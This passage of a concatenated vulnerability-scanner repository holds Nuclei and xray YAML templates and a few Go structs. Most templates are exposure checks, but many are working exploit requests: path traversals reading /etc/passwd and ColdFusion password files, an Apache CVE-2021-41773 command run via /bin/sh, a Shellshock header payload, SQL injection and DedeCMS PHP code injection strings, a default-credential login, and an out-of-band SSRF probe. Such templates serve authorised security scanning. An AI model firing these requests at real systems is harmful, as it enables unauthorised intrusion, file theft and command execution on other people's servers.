8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/wp-content/uploads/" 13 | - "{{BaseURL}}/wp-content/themes/" 14 | - "{{BaseURL}}/wp-content/plugins/" 15 | - "{{BaseURL}}/wp-includes/" 16 | 17 | matchers-condition: and 18 | matchers: 19 | - type: status 20 | status: 21 | - 200 22 | 23 | - type: word 24 | words: 25 | - "Index of /" 26 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/wordpress/wordpress-installer-log.yaml: -------------------------------------------------------------------------------- 1 | id: wordpress-installer-log 2 | 3 | info: 4 | name: WordPress Installer Log 5 | author: dwisiswant0 6 | severity: info 7 | tags: wordpress,log 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/installer-log.txt" 13 | matchers-condition: and 14 | matchers: 15 | - type: regex 16 | regex: 17 | - "(?mi)DUPLICATOR(-|\\s)?(PRO|LITE)?:? INSTALL-LOG" 18 | part: body 19 | - type: status 20 | status: 21 | - 200 -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/wordpress/wordpress-social-metrics-tracker.yaml: -------------------------------------------------------------------------------- 1 | id: wordpress-social-metrics-tracker 2 | 3 | info: 4 | name: Social Metrics Tracker <= 1.6.8 - Unauthorised Data Export 5 | author: randomrobbie 6 | severity: medium 7 | tags: wordpress,wp-plugin 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/wp-admin/admin-ajax.php?page=social-metrics-tracker-export&smt_download_export_file=1" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: status 17 | status: 18 | - 200 19 | - type: word 20 | words: 21 | - "Main URL to Post" 22 | part: body -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/wordpress/wordpress-ssrf-oembed.yaml: -------------------------------------------------------------------------------- 1 | id: wordpress-ssrf-oembed 2 | 3 | info: 4 | name: Wordpress Oembed Proxy SSRF 5 | author: dhiyaneshDk 6 | severity: medium 7 | reference: 8 | - https://book.hacktricks.xyz/pentesting/pentesting-web/wordpress 9 | - https://github.com/incogbyte/quickpress/blob/master/core/req.go 10 | tags: wordpress,ssrf,oast,proxy 11 | 12 | requests: 13 | - method: GET 14 | path: 15 | - "{{BaseURL}}/wp-json/oembed/1.0/proxy?url=http://{{interactsh-url}}/" 16 | 17 | matchers: 18 | - type: word 19 | part: interactsh_protocol 20 | words: 21 | - "http" 22 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/wordpress/wordpress-updraftplus-pem-key.yaml: -------------------------------------------------------------------------------- 1 | id: updraftplus-pem-keys 2 | 3 | info: 4 | name: UpdraftPlus Plugin Pem Key 5 | author: dhiyaneshDk 6 | severity: info 7 | reference: 8 | - https://www.exploit-db.com/ghdb/6437 9 | tags: wordpress,wp-plugin 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}/wp-content/plugins/updraftplus/includes/' 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - "Index of /" 21 | - ".pem" 22 | - "updraftplus" 23 | condition: and 24 | part: body 25 | 26 | - type: status 27 | status: 28 | - 200 29 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/wordpress/wordpress-user-enum.yaml: -------------------------------------------------------------------------------- 1 | id: wordpress-user-enum 2 | 3 | info: 4 | name: Wordpress User Enumeration 5 | author: r3dg33k 6 | severity: info 7 | tags: wordpress 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/?author=1" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: regex 17 | regex: 18 | - '(?i)Location: http(s|):\/\/[\w\.\-]+\/author\/\w+' 19 | part: header 20 | - type: status 21 | status: 22 | - 301 23 | 24 | extractors: 25 | - type: regex 26 | part: header 27 | regex: 28 | - 'author\/\w+' 29 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/wordpress/wp-config-setup.yaml: -------------------------------------------------------------------------------- 1 | id: wp-config-setup 2 | 3 | info: 4 | name: WordPress Setup Configuration 5 | author: princechaddha 6 | severity: high 7 | reference: 8 | - https://smaranchand.com.np/2020/04/misconfigured-wordpress-takeover-to-remote-code-execution/ 9 | tags: wordpress,setup 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/wp-admin/setup-config.php?step=1" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - "Below you should enter your database connection details." 21 | 22 | - type: status 23 | status: 24 | - 200 25 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/wordpress/wp-enabled-registration.yaml: -------------------------------------------------------------------------------- 1 | id: wp-enabled-registration 2 | 3 | info: 4 | name: WordPress user registration enabled 5 | author: Ratnadip Gajbhiye 6 | severity: info 7 | tags: wordpress 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/wp-login.php?action=register' 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - Register For This Site 19 | - E-mail 20 | condition: and 21 | part: body 22 | 23 | - type: status 24 | status: 25 | - 200 26 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/wordpress/wp-full-path-disclosure.yaml: -------------------------------------------------------------------------------- 1 | id: wp-full-path-disclosure 2 | 3 | info: 4 | name: Wordpress - Path Disclosure 5 | author: arcc 6 | severity: info 7 | reference: 8 | - https://make.wordpress.org/core/handbook/testing/reporting-security-vulnerabilities/#why-are-there-path-disclosures-when-directly-loading-certain-files 9 | - https://core.trac.wordpress.org/ticket/38317 10 | tags: debug,wordpress,fpd 11 | 12 | requests: 13 | - method: GET 14 | path: 15 | - "{{BaseURL}}/wp-includes/rss-functions.php" 16 | 17 | matchers: 18 | - type: word 19 | words: 20 | - 'Call to undefined function _deprecated_file()' 21 | part: body 22 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/wordpress/wp-install.yaml: -------------------------------------------------------------------------------- 1 | id: wp-install 2 | 3 | info: 4 | name: WordPress Exposed Installation 5 | author: princechaddha 6 | severity: high 7 | reference: 8 | - https://smaranchand.com.np/2020/04/misconfigured-wordpress-takeover-to-remote-code-execution/ 9 | tags: wordpress 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/wp-admin/install.php" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - "WordPress › Installation" 21 | - "Site Title" 22 | condition: and 23 | 24 | - type: status 25 | status: 26 | - 200 -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/wordpress/wp-license-file.yaml: -------------------------------------------------------------------------------- 1 | id: wp-license-file 2 | 3 | info: 4 | name: WordPress license file disclosure 5 | author: yashgoti 6 | severity: info 7 | tags: wordpress 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/license.txt" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - "WordPress - Web publishing software" 19 | 20 | - type: status 21 | status: 22 | - 200 23 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/wordpress/wp-popup-listing.yaml: -------------------------------------------------------------------------------- 1 | id: wordpress-popup-listing 2 | 3 | info: 4 | name: WordPress Popup Plugin Directory Listing 5 | author: aashiq 6 | severity: info 7 | description: Searches for sensitive directories present in the wordpress-popup plugin. 8 | tags: wordpress,listing,plugin 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/wp-content/plugins/wordpress-popup/views/admin/" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: status 18 | status: 19 | - 200 20 | 21 | - type: word 22 | words: 23 | - "Index of" 24 | - "/wp-content/plugins/wordpress-popup/views/admin" 25 | condition: and 26 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/wordpress/wp-qards-listing.yaml: -------------------------------------------------------------------------------- 1 | id: wp-qards-listing 2 | 3 | info: 4 | name: WordPress Plugin Qards 5 | author: pussycat0x 6 | severity: info 7 | description: Searches for sensitive directories present in the wordpress-plugins plugin. 8 | tags: wordpress,listing,wp-plugin,wp 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/wp-content/plugins/qards/" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - "Index of" 20 | - "/wp-content/plugins/qards" 21 | condition: and 22 | 23 | - type: status 24 | status: 25 | - 200 26 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/wordpress/wp-simple-fields-lfi.yaml: -------------------------------------------------------------------------------- 1 | id: wp-simple-fields-lfi 2 | 3 | info: 4 | name: WordPress Plugin Simple Fields 0.2 - 0.3.5 LFI/RFI/RCE 5 | author: 0x240x23elu 6 | severity: high 7 | reference: 8 | - https://packetstormsecurity.com/files/147102/WordPress-Simple-Fields-0.3.5-File-Inclusion-Remote-Code-Execution.html 9 | tags: wordpress,wp-plugin,lfi 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=/etc/passwd%00" 15 | 16 | matchers: 17 | - type: regex 18 | regex: 19 | - "root:.*:0:0:" 20 | part: body -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/wordpress/wp-super-forms.yaml: -------------------------------------------------------------------------------- 1 | id: wordpress-super-forms 2 | 3 | info: 4 | name: WordPress super-forms Plugin Directory Listing 5 | author: pussycat0x 6 | severity: low 7 | description: Searches for sensitive directories present in the wordpress-plugins plugin. 8 | reference: 9 | - https://www.exploit-db.com/ghdb/6776 10 | tags: wordpress,listing,plugin 11 | 12 | requests: 13 | - method: GET 14 | path: 15 | - "{{BaseURL}}/wp-content/plugins/super-forms/" 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - "Index of /wp-content/plugins/super-forms/" 21 | 22 | - type: status 23 | status: 24 | - 200 25 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/wordpress/wp-tutor-lfi.yaml: -------------------------------------------------------------------------------- 1 | id: wp-tutor-lfi 2 | 3 | info: 4 | name: WordPress Plugin tutor.1.5.3 - Local File Inclusion 5 | author: 0x240x23elu 6 | severity: high 7 | reference: 8 | - https://www.exploit-db.com/exploits/48058 9 | tags: wordpress,wp-plugin,lfi 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=/etc/passwd" 15 | 16 | matchers: 17 | - type: regex 18 | regex: 19 | - "root:.*:0:0:" 20 | part: body -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/wordpress/wp-vault-lfi.yaml: -------------------------------------------------------------------------------- 1 | id: wp-vault-local-file-inclusion 2 | 3 | info: 4 | name: WP Vault 0.8.6.6 Local File Inclusion 5 | author: 0x_Akoko 6 | severity: high 7 | reference: 8 | - https://www.exploit-db.com/exploits/40850 9 | tags: wp-plugin,wordpress,lfi 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/?wpv-image=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd" 15 | 16 | matchers-condition: and 17 | matchers: 18 | 19 | - type: regex 20 | regex: 21 | - "root:.*:0:0:" 22 | 23 | - type: status 24 | status: 25 | - 200 26 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/wordpress/wp-xmlrpc.yaml: -------------------------------------------------------------------------------- 1 | id: wordpress-xmlrpc-file 2 | 3 | info: 4 | name: WordPress xmlrpc 5 | author: udit_thakkur 6 | severity: info 7 | tags: wordpress 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/xmlrpc.php" 13 | matchers: 14 | - type: word 15 | words: 16 | - 'XML-RPC server accepts POST requests only.' 17 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/wordpress/wpdm-cache-session.yaml: -------------------------------------------------------------------------------- 1 | id: wpdm-cache-session 2 | 3 | info: 4 | name: Wpdm-Cache Session 5 | author: dhiyaneshDk 6 | severity: medium 7 | reference: 8 | - https://www.exploit-db.com/ghdb/7004 9 | tags: wordpress 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}/wp-content/uploads/wpdm-cache/' 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - "Index of /" 20 | - ".txt" 21 | - "wpdm-cache" 22 | condition: and 23 | 24 | part: body 25 | - type: status 26 | status: 27 | - 200 28 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/wordpress/wpmudev-pub-keys.yaml: -------------------------------------------------------------------------------- 1 | id: wpmudev-pub-keys 2 | 3 | info: 4 | name: Wpmudev Dashboard Pub Key 5 | author: dhiyaneshDk 6 | severity: medium 7 | reference: 8 | - https://www.exploit-db.com/ghdb/6443 9 | tags: wordpress 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}/wp-content/plugins/wpmudev-updates/keys/' 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - "Index of /" 20 | - ".pub" 21 | - "wpmudev" 22 | condition: and 23 | 24 | part: body 25 | - type: status 26 | status: 27 | - 200 28 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/yonyou/erp-nc-directory-traversal.yaml: -------------------------------------------------------------------------------- 1 | id: erp-nc-directory-traversal 2 | 3 | info: 4 | name: ERP-NC directory traversal 5 | author: pikpikcu 6 | severity: high 7 | reference: 8 | - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g 9 | tags: lfi,erp-nc 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/NCFindWeb?service=IPreAlertConfigService&filename=" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - "Client" 21 | - "ncwslogin.jsp" 22 | - "admin.jsp" 23 | part: body 24 | condition: and 25 | 26 | - type: status 27 | status: 28 | - 200 29 | -------------------------------------------------------------------------------- /pocs_yml/pkg/nuclei/catalog/catalogue.go: -------------------------------------------------------------------------------- 1 | package catalog 2 | 3 | // Catalog is a template catalog helper implementation 4 | type Catalog struct { 5 | templatesDirectory string 6 | } 7 | 8 | // New creates a new Catalog structure using provided input items 9 | func New(directory string) *Catalog { 10 | catalog := &Catalog{templatesDirectory: directory} 11 | return catalog 12 | } 13 | -------------------------------------------------------------------------------- /pocs_yml/pkg/xray/structs/cache.go: -------------------------------------------------------------------------------- 1 | package structs 2 | 3 | import "net/http" 4 | 5 | type HttpRequestCache struct { 6 | Request *http.Request 7 | ProtoRequest *Request 8 | ProtoResponse *Response 9 | } 10 | 11 | type TCPUDPRequestCache struct { 12 | Response []byte 13 | ProtoResponse *Response 14 | } 15 | -------------------------------------------------------------------------------- /pocs_yml/pkg/xray/structs/tasks.go: -------------------------------------------------------------------------------- 1 | package structs 2 | 3 | type Task struct { 4 | Poc Poc 5 | Target string 6 | } 7 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/74cms-sqli-2.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-74cms-sqli-2 2 | manual: true 3 | transport: http 4 | set: 5 | rand: randomInt(200000000, 210000000) 6 | rules: 7 | r0: 8 | request: 9 | cache: true 10 | method: GET 11 | path: /plus/ajax_officebuilding.php?act=key&key=錦%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5({{rand}}),5,6,7,8,9%23 12 | expression: response.body.bcontains(bytes(md5(string(rand)))) 13 | expression: r0() 14 | detail: 15 | author: rexus 16 | links: 17 | - https://www.uedbox.com/post/30019/ 18 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/74cms-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-74cms-sqli 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=aaaaaaa") and extractvalue(1,concat(0x7e,md5(99999999))) -- a 10 | expression: response.body.bcontains(b"ef775988943825d2871e1cfa75473ec") 11 | expression: r0() 12 | detail: 13 | author: jinqi 14 | links: 15 | - https://www.t00ls.net/articles-54436.html 16 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/airflow-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-airflow-unauth 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /admin/ 10 | expression: response.status == 200 && response.body.bcontains(b"Airflow - DAGs") && response.body.bcontains(b"

DAGs

") 11 | expression: r0() 12 | detail: 13 | author: pa55w0rd(www.pa55w0rd.online/) 14 | links: 15 | - http://airflow.apache.org/ 16 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/alibaba-canal-info-leak.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-alibaba-canal-info-leak 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /api/v1/canal/config/1/1 10 | follow_redirects: false 11 | expression: response.status == 200 && response.content_type.icontains("application/json") && response.body.bcontains(b"ncanal.aliyun.accessKey") && response.body.bcontains(b"ncanal.aliyun.secretKey") 12 | expression: r0() 13 | detail: 14 | author: Aquilao(https://github.com/Aquilao) 15 | links: 16 | - https://my.oschina.net/u/4581879/blog/4753320 17 | info: alibaba Canal info leak 18 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/apache-httpd-cve-2021-41773-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-apache-httpd-cve-2021-41773-rce 2 | manual: true 3 | transport: http 4 | set: 5 | r1: randomInt(800000000, 1000000000) 6 | r2: randomInt(800000000, 1000000000) 7 | rules: 8 | r0: 9 | request: 10 | cache: true 11 | method: POST 12 | path: /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh 13 | body: echo;expr {{r1}} + {{r2}} 14 | expression: response.status == 200 && response.body.bcontains(bytes(string(r1 + r2))) 15 | expression: r0() 16 | detail: 17 | author: B1anda0(https://github.com/B1anda0) 18 | links: 19 | - https://nvd.nist.gov/vuln/detail/CVE-2021-41773 20 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/apache-kylin-unauth-cve-2020-13937.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-apache-kylin-unauth-cve-2020-13937 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /kylin/api/admin/config 10 | expression: response.status == 200 && response.headers["Content-Type"].contains("application/json") && response.body.bcontains(b"config") && response.body.bcontains(b"kylin.metadata.url") 11 | expression: r0() 12 | detail: 13 | author: JingLing(github.com/shmilylty) 14 | links: 15 | - https://s.tencent.com/research/bsafe/1156.html 16 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/apache-nifi-api-unauthorized-access.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-apache-nifi-api-unauthorized-access 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /nifi-api/flow/current-user 10 | follow_redirects: false 11 | expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"\"identity\":\"anonymous\",\"anonymous\":true") 12 | expression: r0() 13 | detail: 14 | author: wulalalaaa(https://github.com/wulalalaaa) 15 | links: 16 | - https://nifi.apache.org/docs/nifi-docs/rest-api/index.html 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/apache-storm-unauthorized-access.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-apache-storm-unauthorized-access 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /api/v1/cluster/summary 10 | follow_redirects: false 11 | expression: response.status == 200 && response.body.bcontains(b"{\"totalMem\":") && response.body.bcontains(b"\"stormVersion\":") 12 | expression: r0() 13 | detail: 14 | author: wulalalaaa(https://github.com/wulalalaaa) 15 | links: 16 | - https://storm.apache.org/releases/current/STORM-UI-REST-API.html 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/bash-cve-2014-6271.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-bash-cve-2014-6271 2 | manual: true 3 | transport: http 4 | set: 5 | r1: randomInt(800000000, 1000000000) 6 | r2: randomInt(800000000, 1000000000) 7 | rules: 8 | r0: 9 | request: 10 | cache: true 11 | method: GET 12 | headers: 13 | User-Agent: () { :; }; echo; echo; /bin/bash -c 'expr {{r1}} + {{r2}}' 14 | follow_redirects: false 15 | expression: response.body.bcontains(bytes(string(r1 + r2))) 16 | expression: r0() 17 | detail: 18 | author: neal1991(https://github.com/neal1991) 19 | links: 20 | - https://github.com/opsxcq/exploit-CVE-2014-6271 21 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/bt742-pma-unauthorized-access.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-bt742-pma-unauthorized-access 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /pma/ 10 | follow_redirects: false 11 | expression: response.status == 200 && response.body.bcontains(b"information_schema") && response.body.bcontains(b"phpMyAdmin") && response.body.bcontains(b"server_sql.php") 12 | expression: r0() 13 | detail: 14 | author: Facker007(https://github.com/Facker007) 15 | links: 16 | - https://mp.weixin.qq.com/s/KgAaFRKarMdycYzETyKS8A 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/chinaunicom-modem-default-password.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-chinaunicom-modem-default-password 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: POST 9 | path: /cu.html 10 | body: frashnum=&action=login&Frm_Logintoken=1&Username=CUAdmin&Password=CUAdmin&Username=&Password= 11 | follow_redirects: false 12 | expression: response.status == 302 && response.headers["location"] == "/menu.gch" 13 | expression: r0() 14 | detail: {} 15 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/citrix-cve-2019-19781-path-traversal.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-citrix-cve-2019-19781-path-traversal 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /vpn/../vpns/cfg/smb.conf 10 | follow_redirects: false 11 | expression: response.status == 200 && response.body.bcontains(b"encrypt passwords") && response.body.bcontains(b"name resolve order") 12 | expression: r0() 13 | detail: 14 | author: su(https://suzzz112113.github.io/#blog) 15 | links: 16 | - https://www.tripwire.com/state-of-security/vert/citrix-netscaler-cve-2019-19781-what-you-need-to-know/ 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/citrix-xenmobile-cve-2020-8209.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-citrix-xenmobile-cve-2020-8209 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd 10 | follow_redirects: false 11 | expression: response.status == 200 && response.content_type.contains("octet-stream") && "^root:[x*]:0:0:".bmatches(response.body) 12 | expression: r0() 13 | detail: 14 | author: B1anda0(https://github.com/B1anda0) 15 | links: 16 | - https://nvd.nist.gov/vuln/detail/CVE-2020-8209 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/coldfusion-cve-2010-2861-lfi.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-coldfusion-cve-2010-2861-lfi 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en 10 | follow_redirects: true 11 | expression: response.status == 200 && response.body.bcontains(b"rdspassword=") && response.body.bcontains(b"encrypted=") 12 | expression: r0() 13 | detail: 14 | author: sharecast 15 | links: 16 | - https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861 17 | version: 8.0, 8.0.1, 9.0, 9.0.1 and earlier versions 18 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/confluence-cve-2015-8399.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-confluence-cve-2015-8399 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /spaces/viewdefaultdecorator.action?decoratorName 10 | follow_redirects: false 11 | expression: response.status == 200 && response.body.bcontains(b"confluence-init.properties") && response.body.bcontains(b"View Default Decorator") 12 | expression: r0() 13 | detail: 14 | author: whynot(https://github.com/notwhy) 15 | links: 16 | - https://www.anquanke.com/vul/id/1150798 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/consul-rexec-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-consul-rexec-rce 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /v1/agent/self 10 | expression: 'response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"\"DisableRemoteExec\": false")' 11 | expression: r0() 12 | detail: 13 | author: imlonghao(https://imlonghao.com/) 14 | links: 15 | - https://www.exploit-db.com/exploits/46073 16 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/consul-service-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-consul-service-rce 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /v1/agent/self 10 | expression: 'response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"\"EnableScriptChecks\": true") || response.body.bcontains(b"\"EnableRemoteScriptChecks\": true")' 11 | expression: r0() 12 | detail: 13 | author: imlonghao(https://imlonghao.com/) 14 | links: 15 | - https://www.exploit-db.com/exploits/46074 16 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/coremail-cnvd-2019-16798.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-coremail-cnvd-2019-16798 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /mailsms/s?func=ADMIN:appState&dumpConfig=/ 10 | follow_redirects: false 11 | expression: response.status == 200 && response.body.bcontains(bytes("")) 12 | expression: r0() 13 | detail: 14 | author: cc_ci(https://github.com/cc8ci) 15 | links: 16 | - https://www.secpulse.com/archives/107611.html 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/couchdb-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-couchdb-unauth 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /_config 10 | follow_redirects: false 11 | expression: response.status == 200 && response.body.bcontains(b"httpd_design_handlers") && response.body.bcontains(b"external_manager") && response.body.bcontains(b"replicator_manager") 12 | expression: r0() 13 | detail: 14 | author: FiveAourThe(https://github.com/FiveAourThe) 15 | links: 16 | - https://www.seebug.org/vuldb/ssvid-91597 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/dedecms-cve-2018-6910.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-dedecms-cve-2018-6910 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /include/downmix.inc.php 10 | expression: response.status == 200 && response.body.bcontains(bytes("Fatal error")) && response.body.bcontains(bytes("downmix.inc.php")) && response.body.bcontains(bytes("Call to undefined function helper()")) 11 | expression: r0() 12 | detail: 13 | author: PickledFish(https://github.com/PickledFish) 14 | links: 15 | - https://github.com/kongxin520/DedeCMS/blob/master/DedeCMS_5.7_Bug.md 16 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/dedecms-cve-2018-7700-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-dedecms-cve-2018-7700-rce 2 | manual: true 3 | transport: http 4 | set: 5 | r: randomInt(2000000000, 2100000000) 6 | rules: 7 | r0: 8 | request: 9 | cache: true 10 | method: GET 11 | path: /tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5{{r}};{/dede:field} 12 | follow_redirects: true 13 | expression: response.status == 200 && response.body.bcontains(bytes(md5(string(r)))) 14 | expression: r0() 15 | detail: 16 | author: harris2015(https://github.com/harris2015) 17 | links: 18 | - https://xz.aliyun.com/t/2224 19 | Affected Version: V5.7SP2正式版(2018-01-09) 20 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/dedecms-membergroup-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-dedecms-membergroup-sqli 2 | manual: true 3 | transport: http 4 | set: 5 | r: randomInt(800000000, 1000000000) 6 | rules: 7 | r0: 8 | request: 9 | cache: true 10 | method: GET 11 | path: /member/ajax_membergroup.php?action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5({{r}})+--+@`'` 12 | follow_redirects: true 13 | expression: response.status == 200 && response.body.bcontains(bytes(md5(string(r)))) 14 | expression: r0() 15 | detail: 16 | author: harris2015(https://github.com/harris2015) 17 | links: 18 | - http://www.dedeyuan.com/xueyuan/wenti/1244.html 19 | Affected Version: 5.6,5.7 20 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/dedecms-url-redirection.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-dedecms-url-redirection 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 